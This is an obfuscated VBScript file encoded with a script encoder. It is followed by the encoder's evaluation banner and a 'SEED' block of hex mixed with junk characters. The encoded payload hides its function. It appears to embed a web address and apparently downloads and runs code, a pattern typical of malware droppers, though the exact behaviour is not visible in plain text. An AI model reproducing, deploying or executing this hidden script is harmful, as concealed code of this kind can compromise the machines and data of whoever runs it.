#@~^vwMAAA==$Ds08|A'J~pN6cmwB/nh{A$5aOm9:9:Jj@$~pNr*l2Bk|AGS55qwO^9:9PJUR$pN6Wl2x/nhGS;I	wDm[:xKJjr)?AOP~YsRqa5{1h~InLA(2)qrY4P$Ow%Fpz=RKlDODU{Jˆv$-SOYQ-c#M$'hRD3@$`]wh T_' b_]l yD	+SW8yJ= qTxG.Zbdn{K.ElcMsKAmV'wl^j2=+UN,rP4)ADo%8(5cKCYD+MxxJˆc,'hRT3wR*e,wSOTQ@$v$wh D3#c'R]-h T3be'R,l yD`y~c)yJ=?+D~GAN:mY/Cx$Ds0FXeRA6n^!Y+c$Ds0Fn3*)jY,W4NHmOm4'HWDtrUT)ADo%8(5cKCYD+MxxJ@$ELAOsRqM_)$Ow%FAO{J$pN6Wl2x/nhGS;I	wDm[:xKJjr)A:o%8Zs{$PsRFo5 In2dl^+v$Yw%qFA~J@$ELAPsRqqYb=?YP~Yw0Fo5x1KY4r	o)	0qF!'r$}L}cmwB/FAFh55q2Y1NhB:S?El!IJ'r4DY2=zJN+k+	-W^\nl	oC.ckx6GzQm'TL'JLxRq{!ldY~ADo%8'/.lYn6(Lnm:crHr1DK/W6YcpHdCPKhJbl~K0RqRKw+	E!2:JBj]SSomVd+=$Yw%q k+Y]n$En/Dub[DrZW	YUY KzwJSEmww^rmmYkKU&6 hShR0G.sO;D^nx1W[n9J)$Ow%qRknDIn$E?K4+m[+MJi/DR)T+xDE~rHq:u]qd(r)$Yo08Rj+	[J\Jl[bHPH)Hy3)6i	mObW	P1zX\3K:`b)wW.~b'SU`~YsRq D/aWU/nO6P#DGP8PdOAwOql7l.'tr9`$DsRFRM+k2W	?nY6OSb~F*l1zX}AxHbHyA[-l.lg+pY=nx9PW;	mKrGg)n(^!YnrPA\l^`rE1zX"2:KcbrJ#,lPA6+1;O+,1zX"2~',x0qFTADs0q,JLzIBAA==^#~@


'
'*******************************************************
'
'    This script was produced automatically
'    by an evaluation demo copy of:
'
'     Script Encoder Plus v.3.0.3.9
'
'     User: Administrator
'
'      www.dennisbabkin.com/screnc
'
'    (Please register to make this message go away)
'     Go to Help -> Register ...
'
'*******************************************************
'
' SEED:
'    A0710E7E309sdfsdfA6B036EBEA37B16EDB4AA4611E9CC3B79D1ADsdfsdf7E6B14F0F0352916
'    B0A2057FE939DD4sdfsdfC4C9367BE92464sdfsdf1BB65FA3CF14ECBC6A002A102BF717149A8
'    B3629F2F0D0B85ABB3dsfsfA7A9Dsdf4D1D036A48EC4C469CA5FA03824FA30A85EA8830A
'    98921D725D52DFsdfsdfsdf2D135A279217B06ADDEB61sdfdsf8296551CEBFCABC5B2C4B407AA2E
'    EB5BC10B71Edfdsfsdf6A5E50166C8A3CE082FF2EAE71DC9A5CF14928D6F541C59992AF8


